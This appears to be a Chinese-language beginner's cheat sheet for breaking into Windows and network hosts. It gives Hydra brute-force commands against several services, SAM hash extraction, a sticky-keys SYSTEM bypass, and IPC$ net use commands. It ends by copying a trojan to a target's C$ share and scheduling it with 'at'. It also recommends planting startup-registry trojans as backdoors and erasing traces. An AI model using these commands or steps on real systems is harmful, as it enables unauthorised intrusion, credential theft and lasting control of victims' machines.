特别基础的扫端口,然后用密码字典爆破,重点是熟悉各个端口和底层的应用进程
大体过程
1 信息收集
dos命令查看:nslookup whois ip
如果是做渗透的话,主要的信息收集过程还是要依靠社工,收集目标信息,争取获得更精确的字典。
2 扫描漏洞
3 漏洞利用
4 提权,然后拿flag,或者搞事情(根据中华人民共和国网络安全法,这个还是算了)
5 毁尸灭迹
6 留后门
7 渗透测试报告
远程端口扫描+用户名密码爆破
详见 漏洞端口
nmap扫描
常用命令:
扫描网段内主机:nmap -sP ip/子网掩码
扫描端口号是否开放:nmap -p %ports% ip
扫描端口号的服务版本:nmap -p %ports% -sV
扫描目标ip系统版本:nmap -O ip
全面扫描:nmap -A ip
生成文档:nmap -O ip -oN d:\result.txt
九头蛇(Hydra)扫描+爆破
-L 是用users.txt字典,-P 是用passwd.txt字典。
例:a是指用户名
Hydra -l a -p 123 10.1.1.1 telnet
Hydra -l a -P e:\pass.txt 10.1.1.1 telnet
Hydra -l a -P e:\pass.txt 10.1.1.1 rdp
Hydra -l a -P e:\pass.txt 10.1.1.1 smb
Hydra -l a -P e:\pass.txt 10.1.1.1 ftp
Hydra -l a -P e:\pass.txt 10.1.1.1 ssh
Hydra -l a -P e:\pass.txt 10.1.1.1 mysql
Hydra -L e:\user.txt -P e:\pass.txt 10.1.1.1 telnet
用户名和密码可以使用密码生成工具,或者自己准备一些用户名密码字典。
抓包
telnet等协议在传输帧的时候,有的是单个字符传输,抓取telnet或者icmp的帧,查看传输的数据,就可以破获密码,但是ssh就不行了,所以推荐使用ssh。
本地爆破
1:hash值爆破,windows中的密码是储存在c:/windows/system32/SAM文件中,可以通过工具提取,例如pwddump.exe
2:5次shift粘滞键,先是断电重启电脑,进入磁盘修复模式,然后通过弹出的txt文件上的打开。以system的身份修改重命名粘滞键为cmd,这样就可以以system的身份,修改或者创建用户。
3:PE系统,这个可以直接搞出,网上很多教程,生成PE的工具也有不少。
留后门
为了方便下一次接管目标PC,可以在对方磁盘中留下木马,一般会放置在启动注册表中,不调用时并不会影响对方计算机,但是想调用时可以很快控制对方电脑,好像是成为肉鸡。
这个我也只了解通过telnet,ftp非匿名登陆等等方式,爆破得到用户名密码后,然后使用工具上传木马。(比如鸽子牧民战,一般是使用网页挂马,并且会加壳隐蔽自己)
445端口
漏洞利用之IPC$:
进行暴力破解:NTscan
dos命令示意:
net use \10.1.1.2\ipc$ 密码 /user:用户
net use f: \10.1.1.2\share 密码 /user:用户
net use f: /del
net use * /del
net use f: \10.1.1.2\c$ 密码 /user:用户
f 是盘符,没有被占用的盘符,就是创建一个新盘,链接分享文件。
然后IPC$之后可以手动植入木马:
copy d:\heihei.exe \10.1.1.2\c$
设置计划任务自动执行木马:
net time \10.1.1.2
获取靶机时间
at \10.1.1.2 11:11 “c:\heihei.exe”
设置木马启动时间